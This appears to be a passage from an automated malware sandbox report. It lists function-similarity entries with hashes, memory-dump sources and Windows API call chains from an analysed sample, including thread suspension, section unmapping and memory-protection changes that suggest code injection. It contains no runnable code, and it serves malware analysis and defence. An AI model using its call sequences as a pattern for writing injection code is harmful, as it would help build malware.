  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
